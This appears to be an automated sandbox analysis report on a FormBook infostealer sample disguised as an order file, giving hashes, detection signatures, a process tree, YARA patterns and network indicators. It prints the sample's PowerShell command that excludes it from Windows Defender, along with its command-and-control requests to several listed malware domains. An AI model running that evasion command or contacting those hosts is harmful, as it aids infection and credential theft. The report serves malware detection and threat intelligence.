Windows Analysis Report
spec 4008670601 AZTEK Order.exe

Overview

General Information

Sample name: spec 4008670601 AZTEK Order.exe
Analysis ID: 1467079
MD5: f07575dcccaa8b88972464b50b63b017
SHA1: 7949418fc5d9d6fd76c1d0349fc8dce96d777e1d
SHA256: 6ce9c6e014f84badeec8435e6e781fbde6946dc45b627aff3a307e4dee1f0934
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • spec 4008670601 AZTEK Order.exe (PID: 1008 cmdline: "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe" MD5: F07575DCCCAA8B88972464B50B63B017)
    • powershell.exe (PID: 6136 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • spec 4008670601 AZTEK Order.exe (PID: 2244 cmdline: "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe" MD5: F07575DCCCAA8B88972464B50B63B017)
      • OFEkXEMCZC.exe (PID: 400 cmdline: "C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • compact.exe (PID: 3432 cmdline: "C:\Windows\SysWOW64\compact.exe" MD5: 5CB107F69062D6D387F4F7A14737220E)
          • OFEkXEMCZC.exe (PID: 5776 cmdline: "C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7156 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
    • 0x2ae20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1444f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
    • 0x2ae20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1444f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000E.00000002.4564754025.00000000050C0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
6.2.spec 4008670601 AZTEK Order.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
6.2.spec 4008670601 AZTEK Order.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
    • 0x2e1c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x177f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
6.2.spec 4008670601 AZTEK Order.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
6.2.spec 4008670601 AZTEK Order.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
    • 0x2d3c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x169f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe", ParentImage: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, ParentProcessId: 1008, ParentProcessName: spec 4008670601 AZTEK Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe", ProcessId: 6136, ProcessName: powershell.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe", ParentImage: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, ParentProcessId: 1008, ParentProcessName: spec 4008670601 AZTEK Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe", ProcessId: 6136, ProcessName: powershell.exe
            No Snort rule has matched

            AV Detection

            Source: http://www.architect-usschool.com/s24g/ | Avira URL Cloud: Label: malware
            Source: http://www.architect-usschool.com/s24g/?Bp=2LpD8tLh&7Dihs8p=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM= | Avira URL Cloud: Label: malware
            Source: http://architect-usschool.com/s24g/?Bp=2LpD8tLh&7Dihs8p=4rIlPCx72NWCI0QJXJwD | Avira URL Cloud: Label: malware
            Source: http://yg08.gowi0i.xyz | Avira URL Cloud: Label: malware
            Source: spec 4008670601 AZTEK Order.exe | ReversingLabs: Detection: 23%
            Source: Yara matchFile source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.4564754025.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4561997871.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2526010135.0000000001700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4561941727.0000000004890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2527736172.00000000038C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
            Source: spec 4008670601 AZTEK Order.exe | Joe Sandbox ML: detected
            Source: spec 4008670601 AZTEK Order.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: spec 4008670601 AZTEK Order.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: compact.pdbGCTL source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2525813902.0000000001238000.00000004.00000020.00020000.00000000.sdmp, OFEkXEMCZC.exe, 0000000A.00000002.4559414120.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OFEkXEMCZC.exe, 0000000A.00000000.2448002882.0000000000AEE000.00000002.00000001.01000000.0000000C.sdmp, OFEkXEMCZC.exe, 0000000E.00000000.2595889432.0000000000AEE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000C.00000003.2528050856.0000000003528000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000003.2525747236.0000000003377000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: QgGC.pdbSHA256 source: spec 4008670601 AZTEK Order.exe
            Source: Binary string: wntdll.pdb source: spec 4008670601 AZTEK Order.exe, spec 4008670601 AZTEK Order.exe, 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, compact.exe, compact.exe, 0000000C.00000003.2528050856.0000000003528000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000003.2525747236.0000000003377000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: compact.pdb source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2525813902.0000000001238000.00000004.00000020.00020000.00000000.sdmp, OFEkXEMCZC.exe, 0000000A.00000002.4559414120.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: QgGC.pdb source: spec 4008670601 AZTEK Order.exe
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DDC170 FindFirstFileW,FindNextFileW,FindClose,12_2_02DDC170
            Source: C:\Windows\SysWOW64\compact.exeCode function: 4x nop then xor eax, eax12_2_02DC96F0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 4x nop then mov ebx, 00000004h12_2_03A2053F

            Networking

            Source: DNS query: www.hellokong.xyz
            Source: Joe Sandbox View | IP Address: 64.190.62.22
            Source: Joe Sandbox View | IP Address: 203.161.49.220
            Source: Joe Sandbox View | ASN Name: VNPT-AS-VNVNPTCorpVN
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /jmiz/?Bp=2LpD8tLh&7Dihs8p=FlIs+r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p/5DHHhHlE1nDIZgKO5qXvVh1+gwmyYcA+2CCaGrmZckpjuvJQ96WUy8TtzIG0Do= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.fondazionegtech.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /92z0/?7Dihs8p=Gchg326o6RWN/XFADw/V4eD2MO3apSP8yQOPkbolGTbWXGJL1kFLipwvr6KFDeoH1MC+XiIJPCdl50bZjywkZNBk97uFxrq9QGi9z8UXs1GhAfMLlFrOVkcHu0q9EP6WPl8Zh5k=&Bp=2LpD8tLh HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.mengistiebethlehem.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /oc7s/?Bp=2LpD8tLh&7Dihs8p=ITz00edB1Uq7JDbRPTK5B57t89T2WQZ+hnFFsCQVLpiDf2LeJizgG+jH2jz5I+TBlRR/yAoHWWMQTB4d0WCMdZHpvgPMtRMFWqdBjyYGuisLgsnAd4XsPoSnl82L2CWvs48fsL0= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.ad14.funUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /2769/?7Dihs8p=rQ9MRvShllEvhf19NmQGPjdBfvwxqGfh/iQ/JyzvIKd3JVnhiEf6Ad8S1fm4YmYs4WBXtXN2+GWeVsdjOCq4N3yCg9FNbaHUg89/agQhGCosY8uNQEp6VxplmSeNniynJ3fH1F8=&Bp=2LpD8tLh HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.epicbazaarhub.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /wvam/?Bp=2LpD8tLh&7Dihs8p=ppN4Kg7gaCRo+jf4iLEmna60kcJd+oo7/wZIRMT4+Man5OlGV28GmQNPMVld/mi8klF/kBnYjgc4RUC2chY7WuIAYm4xk+Ll6sKGI2rWgbxJmoqgO5rVx7RJwqzCMQvvfrLjQU4= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.rz6grmvv.shopUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /oui5/?7Dihs8p=SBbMJInblZiNUqJtj2t3oAZeaf7w1Mr63FaPzYR5npk3jTg+edZF9NME4tF9tViJCHx7c4tSq6N/qcOwzg98IChDG2ekcZOWcYJRK2znKimA3GQ/fbvAwxxdlKlVh8HBUwdv3Sg=&Bp=2LpD8tLh HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.hellokong.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /s24g/?Bp=2LpD8tLh&7Dihs8p=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.architect-usschool.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /3jr0/?7Dihs8p=C6nbN3Z6SrmD48dKFL5Pdr+cZFmYp1QsQ3e628IyGZcRZCB2vhKb6ox4g6I37OYbmAVSFMbRXnVDWcusSAPk0vfQfIagm0ASlZK02lSA38wn9PDfH1oUKWJrxTMbBcOAU+1qziI=&Bp=2LpD8tLh HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.easybackpage.netUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /mwa4/?Bp=2LpD8tLh&7Dihs8p=BKtoJfTGgHJzrpd1kXP6JuCpnJS0Vaq/yhZppoO2EP353cwV9Kf7u0HM3e0YD5Mg8P8TnPOgCoBiwA2kvNm9UdnLeQplEPepVbn/svzmQdla2L+ZsYtoIxEUyzWZOW0K59hRfLs= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.superunicornpalace.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /rxdf/?7Dihs8p=n5pckC1kDFTF1S5BKIsmiJ5ryDhRlCYaQVQlc2liktwXiyajKP48Wkncu6FoMqtxFtMv+2TSpEcAsDV+dI8BV0td651LvJeUOcJvnAipjtqBUQAoEW2kSo5oIr+iYWP+5LowsUg=&Bp=2LpD8tLh HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.tedjp-x.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /n8zi/?Bp=2LpD8tLh&7Dihs8p=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXePjBpDkk8R6CbNZjNtV+M1xTH1M7WEFVhsxtrVg+jjfEC0sBsxKcDNAG8QmzJp6ywkUHIkWAXYoQO53dC+2pPrw= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.3cubesinterior.inUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /s0j2/?7Dihs8p=BcB93STIeRzesDqYzmgjF/8Aqg2qoGbugvfC7gVQd0Epq+RTfyEF6eLz+ZShIqPWgjFYuR+pkePM3whd8giEyH2988JCuLY+vIFLWxAqbBoWpgzIu1DPnhlaAUBnkOtEvd711RA=&Bp=2LpD8tLh HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.artvectorcraft.storeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /pv57/?7Dihs8p=6UcJOPuI3ds3m8dRFaGqe18kk0aRE6C9zfep+6iQQcPKXv8sEJKo1I2dFrwlAwFzKSJLgqMZnt8gW4RLGDqdj2op7I/d7Qwx4DLM/Sb7UzOzABLy3akf6gQBeurdxZRPhPoEffE=&Bp=2LpD8tLh HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.hondamechanic.todayUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficDNS traffic detected: DNS query: www.fondazionegtech.org
            Source: global trafficDNS traffic detected: DNS query: www.mengistiebethlehem.com
            Source: global trafficDNS traffic detected: DNS query: www.ad14.fun
            Source: global trafficDNS traffic detected: DNS query: www.epicbazaarhub.com
            Source: global trafficDNS traffic detected: DNS query: www.rz6grmvv.shop
            Source: global trafficDNS traffic detected: DNS query: www.hellokong.xyz
            Source: global trafficDNS traffic detected: DNS query: www.architect-usschool.com
            Source: global trafficDNS traffic detected: DNS query: www.easybackpage.net
            Source: global trafficDNS traffic detected: DNS query: www.superunicornpalace.com
            Source: global trafficDNS traffic detected: DNS query: www.tedjp-x.com
            Source: global trafficDNS traffic detected: DNS query: www.3cubesinterior.in
            Source: global trafficDNS traffic detected: DNS query: www.artvectorcraft.store
            Source: global trafficDNS traffic detected: DNS query: www.macklaer.com
            Source: global trafficDNS traffic detected: DNS query: www.hondamechanic.today
            Source: unknownHTTP traffic detected: POST /92z0/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cache-Control: max-age=0Content-Length: 212Content-Type: application/x-www-form-urlencodedConnection: closeHost: www.mengistiebethlehem.comOrigin: http://www.mengistiebethlehem.comReferer: http://www.mengistiebethlehem.com/92z0/User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:51:46 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 14879Content-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:51:49 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 14879Content-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:51:52 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 14879Content-Type: text/html; charset=UTF-8
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Wed, 03 Jul 2024 15:52:00 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Wed, 03 Jul 2024 15:52:03 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Wed, 03 Jul 2024 15:52:06 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Wed, 03 Jul 2024 15:52:08 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Wed, 03 Jul 2024 15:52:15 GMT
            Server: Apache
            Content-Length: 389
            Connection: close
            Content-Type: text/html
            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Wed, 03 Jul 2024 15:52:17 GMT
            Server: Apache
            Content-Length: 389
            Connection: close
            Content-Type: text/html
            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Wed, 03 Jul 2024 15:52:20 GMT
            Server: Apache
            Content-Length: 389
            Connection: close
            Content-Type: text/html
            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Wed, 03 Jul 2024 15:52:22 GMT
            Server: Apache
            Content-Length: 389
            Connection: close
            Content-Type: text/html; charset=utf-8
            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Date: Wed, 03 Jul 2024 15:52:28 GMT
            Server: Apache
            X-Powered-By: PHP/8.2.20
            Expires: Wed, 11 Jan 1984 05:00:00 GMT
            Cache-Control: no-cache, must-revalidate, max-age=0
            Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Date: Wed, 03 Jul 2024 15:52:31 GMT
            Server: Apache
            X-Powered-By: PHP/8.2.20
            Expires: Wed, 11 Jan 1984 05:00:00 GMT
            Cache-Control: no-cache, must-revalidate, max-age=0
            Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Date: Wed, 03 Jul 2024 15:52:31 GMT
            Server: Apache
            X-Powered-By: PHP/8.2.20
            Expires: Wed, 11 Jan 1984 05:00:00 GMT
            Cache-Control: no-cache, must-revalidate, max-age=0
            Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Date: Wed, 03 Jul 2024 15:52:33 GMT
            Server: Apache
            X-Powered-By: PHP/8.2.20
            Expires: Wed, 11 Jan 1984 05:00:00 GMT
            Cache-Control: no-cache, must-revalidate, max-age=0
            Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            expires: Wed, 11 Jan 1984 05:00:00 GMT
            cache-control: no-cache, must-revalidate, max-age=0
            content-type: text/html; charset=UTF-8
